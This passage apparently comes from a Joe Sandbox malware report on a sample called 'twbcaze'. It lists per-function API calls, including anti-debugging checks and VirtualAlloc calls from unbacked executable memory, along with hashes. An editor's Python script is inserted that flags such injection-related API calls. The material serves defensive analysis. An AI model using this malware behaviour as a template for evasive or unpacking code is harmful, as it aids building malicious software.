                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                          • String ID:
                                          • API String ID: 1660781231-0
                                          • Opcode ID: 95239937f6728c2ab273cbb288612d97b27c62561239d8ac005eaa4639cae67a
                                          • Instruction ID: b388f827fee2bdd613f80f24e28f98c854151017074bbf60c3304b4d43f3c84a
                                          • Opcode Fuzzy Hash: 95239937f6728c2ab273cbb288612d97b27c62561239d8ac005eaa4639cae67a
                                          • Instruction Fuzzy Hash: 41D0A775704383648D1436B239335DB22842C11BF43B0134FE020852D2FB9C88C4601D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: efe380341a0ec7d5170a2d1c18936f96d49b48d58a511d61a9babb171d4075cd
                                          • Instruction ID: d90ecc263459b9024e9a5ab86625f60e66499811c376325d538ba221564ca309
                                          • Opcode Fuzzy Hash: efe380341a0ec7d5170a2d1c18936f96d49b48d58a511d61a9babb171d4075cd
                                          • Instruction Fuzzy Hash: 0301F5337042116F9B168E6AED80ADB33D6EB843607144126F905CB668EB38E88687D9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041BD43: RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,0041B00A,00000001,00000364,00000005,000000FF,?,?,?,0041531C,0041ACE4,?), ref: 0041BD84
                                          • _free.LIBCMT ref: 00420CEE
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: ca24e7fb0318055d8d14544885d4b33f3381520c0c2db4bc62b6f3ec6a8be3c9
                                          • Instruction ID: e859af2a5ef6ee809bec15339cd08cbb7ee5ae1fd0eb6685ca64927a6fa89387
                                          • Opcode Fuzzy Hash: ca24e7fb0318055d8d14544885d4b33f3381520c0c2db4bc62b6f3ec6a8be3c9
                                          • Instruction Fuzzy Hash: 91012BB26043266BC3208F6AD481ACAFBD8FB04770F54072EE555A77C1E3746810C7E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 002307DA: GetSystemInfo.KERNELBASE(?), ref: 002307F7
                                          • VirtualAllocExNuma.KERNELBASE(00000000), ref: 0023089D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocInfoNumaSystemVirtual
                                          • String ID:
                                          • API String ID: 449148690-0
                                          • Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                          • Instruction ID: f31b1920cab429323816aaa73a1dcd5f9a0a2f8b694d18ebbeaa0ff08696d504
                                          • Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                          • Instruction Fuzzy Hash: 6CF036F0D64309BEEB147BF08CABB6DB6789F00701F104595BA40B61C3DA785A208EB9
                                          Uniqueness

                                          Uniqueness Score: -1.00%
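The following Python script is an added example by the editor; it is not part of the Joe Sandbox report and not code from the analysed sample. It parses function entries in the format used throughout this section (API lines carrying a `ref:` address, followed by a `Source File` line) and decodes the memory region each function was dumped from, so that calls such as the `VirtualAllocExNuma` above, which execute from a region marked `based on PE: false`, can be separated from the C runtime helpers that live in the PE image at 0x401000. The field layout assumed for the `.sdmp` file name (fourth field = region base, fifth = page protection, seventh = memory type) is inferred from the values on this page and is an assumption, not documented Joe Sandbox behaviour; the PAGE_* and MEM_* constants are the winnt.h values, and the API watch-list is the editor's own choice. The sample input is constructed from entries on this page; the `Source File` line attached to the `VirtualAlloc(00000000,17D78400,00003000,00000004)` entry is assumed to be the same 0x230000 region as the `VirtualAllocExNuma` entry.

```python
import re

# winnt.h constants used to decode the region a function was dumped from.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
MEM_ALLOC = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
EXEC_MASK = 0xF0  # any PAGE_EXECUTE* bit

# Memory-management / injection APIs worth flagging when called from non-image
# memory.  Editor's watch-list, not something the report defines.
WATCH_APIS = {"VirtualAlloc", "VirtualAllocEx", "VirtualAllocExNuma", "NtAllocateVirtualMemory",
              "WriteProcessMemory", "NtWriteVirtualMemory", "SetThreadContext",
              "NtSetContextThread", "QueueUserAPC", "NtQueueApcThread", "ResumeThread"}

# "[Part of subcall function XXXXXXXX: ]Api.MODULE(args), ref: XXXXXXXX"  (args optional)
API_RE = re.compile(r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?(?P<api>\w+)\."
                    r"(?P<mod>[A-Za-z0-9_]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})")
SRC_RE = re.compile(r"Source File:\s*(?P<name>[0-9A-Fa-f.]+\.sdmp),\s*Offset:\s*[0-9A-F]+,"
                    r"\s*based on PE:\s*(?P<pe>true|false)")

# Constructed sample: three entries copied from this report page.  The Source File
# attached to the VirtualAlloc entry is ASSUMED to be the same 0x230000 region.
SAMPLE = """\
APIs
  • Part of subcall function 002307DA: GetSystemInfo.KERNELBASE(?), ref: 002307F7
• VirtualAllocExNuma.KERNELBASE(00000000), ref: 0023089D
Memory Dump Source
• Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
Uniqueness Score: -1.00%
APIs
• RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,0041B00A,00000001,00000364,00000005,000000FF,?,?,?,0041531C,0041ACE4,?), ref: 0041BD84
Memory Dump Source
• Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Uniqueness Score: -1.00%
APIs
• VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 00230777
Memory Dump Source
• Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
"""

def decode_region(name, pe_backed):
    """Decode the .sdmp name.  Field layout (index 3 = region base, 4 = page protection,
    6 = memory type) is an ASSUMPTION inferred from the values on this page."""
    f = name[:-len(".sdmp")].split(".")
    protect, mtype = int(f[4], 16), int(f[6], 16)
    return {"base": int(f[3], 16), "protect": protect,
            "protect_name": PAGE_PROTECT.get(protect, hex(protect)),
            "type_name": MEM_TYPE.get(mtype, hex(mtype)), "pe_backed": pe_backed}

def parse_entries(text):
    """Each 'APIs' header starts an entry; API lines are collected until the entry's
    Source File line, which is decoded into the region the function lives in."""
    entries, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = {"apis": [], "region": None}
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = SRC_RE.search(s)
        if m:
            cur["region"] = decode_region(m["name"], m["pe"] == "true")
            continue
        m = API_RE.search(s)
        if m:
            cur["apis"].append(m.groupdict())  # keys: sub, api, mod, args, ref
    return entries

def decode_virtualalloc(args):
    """Decode VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect) as the
    sandbox prints it; '?' marks an argument it could not resolve."""
    f = [a.strip() for a in args.split(",")]
    def val(i):
        return int(f[i], 16) if i < len(f) and f[i] != "?" else None
    size, alloc, prot = val(1), val(2), val(3)
    return {"size": size,
            "alloc_flags": [n for b, n in MEM_ALLOC.items() if alloc is not None and alloc & b],
            "protect_name": PAGE_PROTECT.get(prot, "?" if prot is None else hex(prot))}

def triage(entries):
    """Flag watch-listed APIs called from executable memory that is not backed by a
    PE image: the pattern of an unpacked stage running out of a heap/VirtualAlloc buffer."""
    hits = []
    for e in entries:
        r = e["region"]
        if r is None or r["pe_backed"] or not (r["protect"] & EXEC_MASK):
            continue
        for a in e["apis"]:
            if a["api"] not in WATCH_APIS:
                continue
            hit = {"api": a["api"], "ref": a["ref"], "region_base": r["base"],
                   "protect": r["protect_name"], "type": r["type_name"]}
            if a["api"] == "VirtualAlloc" and a["args"]:
                hit["decoded"] = decode_virtualalloc(a["args"])
            hits.append(hit)
    return hits

if __name__ == "__main__":
    for h in triage(parse_entries(SAMPLE)):
        print(h)
```

Run against the entries on this page, the image at 0x401000 decodes to PAGE_EXECUTE_READ / MEM_IMAGE with `based on PE: true` and is skipped, while the 0x230000 region decodes to PAGE_EXECUTE_READWRITE / MEM_PRIVATE with `based on PE: false`, so both the `VirtualAllocExNuma` call and the `VirtualAlloc` call are reported. The `VirtualAlloc` arguments decode to a request for exactly 400,000,000 bytes (0x17D78400) with MEM_COMMIT | MEM_RESERVE and PAGE_READWRITE, which is the kind of detail worth carrying into a triage note rather than leaving as raw hex.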

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,0041B00A,00000001,00000364,00000005,000000FF,?,?,?,0041531C,0041ACE4,?), ref: 0041BD84
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 4518dd0a2feec861e08341a654e625ee5977cd5c18c16e7c700ed9ce5b085929
                                          • Instruction ID: c559202f84c89cc676257c6e14c9c7052fb4074db409f4c442a073e6ba8dcb46
                                          • Opcode Fuzzy Hash: 4518dd0a2feec861e08341a654e625ee5977cd5c18c16e7c700ed9ce5b085929
                                          • Instruction Fuzzy Hash: F7F0E931640628A7DB296F22BC01BDF3758EF417A0B198127AC18D7290CB28DC8186EC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E0E2,?,?,00401942,00000000,?,00401851), ref: 0041ACD3
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 312f93da3f20f1bf995cafa9908406634ba9ab6ab0ad3f1a4bd5593490ff2293
                                          • Instruction ID: 6ad9cb94f8624884a5fba2963b8d04d3184dc4183697b6faf1641f4fbdd2e650
                                          • Opcode Fuzzy Hash: 312f93da3f20f1bf995cafa9908406634ba9ab6ab0ad3f1a4bd5593490ff2293
                                          • Instruction Fuzzy Hash: 4AE0ED3120262197DB213A6A9C04BDB3A48AF413A1F190167AC1497290FB68CCE1A2EF
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • InitializeCriticalSectionEx.KERNELBASE(?,00000FA0,00000000), ref: 0040F8D5
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalInitializeSection
                                          • String ID:
                                          • API String ID: 32694325-0
                                          • Opcode ID: 36b25f4602481f61584a5de2f85143af6d147a148cb4cdad9f560f8bbfb345e5
                                          • Instruction ID: 760cff598c0ffdcda0dee0a134f1822bc451b676202f3ab48e013d8b785bf01b
                                          • Opcode Fuzzy Hash: 36b25f4602481f61584a5de2f85143af6d147a148cb4cdad9f560f8bbfb345e5
                                          • Instruction Fuzzy Hash: 03B09270289248BEDF214B61FC06FB87F209B82740F50016AF54EA88F2C6A214629E0A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • InitializeCriticalSectionEx.KERNELBASE(?,00000FA0,00000000), ref: 0040F8D5
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalInitializeSection
                                          • String ID:
                                          • API String ID: 32694325-0
                                          • Opcode ID: e131c9beb6c6debaa7ce301fc3837ef45f21eb32382bac0d7cf9ab0fc3dcdcfa
                                          • Instruction ID: 53b1aa524083811a7940a92cdcfe98958b27ed318f9b9838b95bcab2cc1fd6e0
                                          • Opcode Fuzzy Hash: e131c9beb6c6debaa7ce301fc3837ef45f21eb32382bac0d7cf9ab0fc3dcdcfa
                                          • Instruction Fuzzy Hash: 8CB0127038430CBBDE201B42FC06F647F1CDB42B50F800031F60C584F18BA27462598E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 00230777
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                          • Instruction ID: 89578fef44c9edde2976b96be7d803d835a2fae15866aa791ca6f347d65c1efd
                                          • Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                          • Instruction Fuzzy Hash: 081106B0D10219AFDB04EFA8CC99BAEFBB4EB04304F208495E915B7291D2755A548FA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,2000000B,0041F91C,00000002,00000000,?,?,?,0041F91C,?,00000000), ref: 0041FFD6
                                          • GetLocaleInfoW.KERNEL32(00000000,20001004,0041F91C,00000002,00000000,?,?,?,0041F91C,?,00000000), ref: 0041FFFF
                                          • GetACP.KERNEL32(?,?,0041F91C,?,00000000), ref: 00420014
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$OCP
                                          • API String ID: 2299586839-711371036
                                          • Opcode ID: df216761bba3a61558e4d0c2f5230fed2d25ec901e075f517e6ef4b9634f3f20
                                          • Instruction ID: 1b401f6d518fe2f060409384912976397a41c3c398af64b9d02de9e00f52b45e
                                          • Opcode Fuzzy Hash: df216761bba3a61558e4d0c2f5230fed2d25ec901e075f517e6ef4b9634f3f20
                                          • Instruction Fuzzy Hash: 4921B372B00110AAEB34CF15E900BD7B3A6BB55B64B968437E806D7201E776DE87C368
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041AE68: GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                            • Part of subcall function 0041AE68: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                            • Part of subcall function 0041AE68: _free.LIBCMT ref: 0041AECA
                                            • Part of subcall function 0041AE68: _free.LIBCMT ref: 0041AF00
                                          • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0041F8DF
                                          • IsValidCodePage.KERNEL32(00000000), ref: 0041F928
                                          • IsValidLocale.KERNEL32(?,00000001), ref: 0041F937
                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0041F97F
                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0041F99E
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                          • String ID:
                                          • API String ID: 949163717-0
                                          • Opcode ID: 4450b43d476ebd8749d984c17ed601da3922cdb14badebefc068301d31160f09
                                          • Instruction ID: 7e664b6f5e4f920847f2175219db3c0f79883923b7aa8754a8eb1c8ce9724d0e
                                          • Opcode Fuzzy Hash: 4450b43d476ebd8749d984c17ed601da3922cdb14badebefc068301d31160f09
                                          • Instruction Fuzzy Hash: 385172B1A00205AEEB10EFA5DC41BEB77B8BF04704F14447BE505E7291E778998ACB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0040F715
                                          • IsDebuggerPresent.KERNEL32 ref: 0040F7E1
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 0040F801
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0040F80B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                          • String ID:
                                          • API String ID: 254469556-0
                                          • Opcode ID: 92d171cdb7cb6d76cddd416fc18485c383169333c85ecc22f5dfc94481a58bc5
                                          • Instruction ID: a2186bf3e758ef2dc04a5ba889b604cd713b75795d90941758fdbf2878431c07
                                          • Opcode Fuzzy Hash: 92d171cdb7cb6d76cddd416fc18485c383169333c85ecc22f5dfc94481a58bc5
                                          • Instruction Fuzzy Hash: 09311AB5D012189BDF60EFA5D9897CDBBB8BF08304F1041BAE40DA7290EB755A85CF49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041AE68: GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                            • Part of subcall function 0041AE68: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                            • Part of subcall function 0041AE68: _free.LIBCMT ref: 0041AECA
                                            • Part of subcall function 0041AE68: _free.LIBCMT ref: 0041AF00
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041FB18
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041FB62
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041FC28
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale$ErrorLast_free
                                          • String ID:
                                          • API String ID: 3140898709-0
                                          • Opcode ID: c9e66a47e9dcce08395d24c0a0bc0a7c348b3432911b7095e2b59eef629d9b1c
                                          • Instruction ID: 65ecd40137fe6b4f3b18d46bc5ae155ef0a382def28203f71d6c2093bf5f65f3
                                          • Opcode Fuzzy Hash: c9e66a47e9dcce08395d24c0a0bc0a7c348b3432911b7095e2b59eef629d9b1c
                                          • Instruction Fuzzy Hash: 8A61627150421B9BDB249F25D892BE677A8FF04314F14807BED06C6285F738E9C6DB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 004157DE
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 004157E8
                                          • UnhandledExceptionFilter.KERNEL32(0040E790), ref: 004157F5
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 66b54a4f5fa8bd941c2e71a588356a4736ee2f5a83fa318b13daa1e7aeff5363
                                          • Instruction ID: 0dde07209dfff96d70bba044140d6ead9c002d577b93866162e4f22fccfde345
                                          • Opcode Fuzzy Hash: 66b54a4f5fa8bd941c2e71a588356a4736ee2f5a83fa318b13daa1e7aeff5363
                                          • Instruction Fuzzy Hash: E831C6B4901218EBCB21EF65D9897CDBBB4BF48310F5045EAE41CA72A0E7749F858F49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32(0040E8B6,?,0041335B,00000004,00000000,0040E8B6,00000004,0040E8B6,00000000), ref: 004132C5
                                          • TerminateProcess.KERNEL32(00000000,?,0041335B,00000004,00000000,0040E8B6,00000004,0040E8B6,00000000), ref: 004132CC
                                          • ExitProcess.KERNEL32 ref: 004132DE
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: e9f30ef7f058bfcb92595cb5ecd326114696ab5173aaa3a0b9c26b3da9d31081
                                          • Instruction ID: 669fa4add18d7d506d1f369d8e27cfdf62f79ebbebf5758064ee3c4fa42b6d56
                                          • Opcode Fuzzy Hash: e9f30ef7f058bfcb92595cb5ecd326114696ab5173aaa3a0b9c26b3da9d31081
                                          • Instruction Fuzzy Hash: 32E0EC71201248AFCF217F56DD099C93B69FF45752B804466F80596232CB79EED2CB8C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040F4AC
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FeaturePresentProcessor
                                          • String ID:
                                          • API String ID: 2325560087-0
                                          • Opcode ID: e18d4502850a283a2bc9f2affa6179b4a73d75b53ed98199151f2e822a03349d
                                          • Instruction ID: 25393b13f6cf6b1be926e12024bfbac8d582d53e7fc82ae2a865a5802fcf0590
                                          • Opcode Fuzzy Hash: e18d4502850a283a2bc9f2affa6179b4a73d75b53ed98199151f2e822a03349d
                                          • Instruction Fuzzy Hash: 3051B0B1A102159FDB24CF69D9817AABBF0FB48714F24C43AC404EB3A0E379A904CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041AE68: GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                            • Part of subcall function 0041AE68: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                            • Part of subcall function 0041AE68: _free.LIBCMT ref: 0041AECA
                                            • Part of subcall function 0041AE68: _free.LIBCMT ref: 0041AF00
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041FDCA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast_free$InfoLocale
                                          • String ID:
                                          • API String ID: 2003897158-0
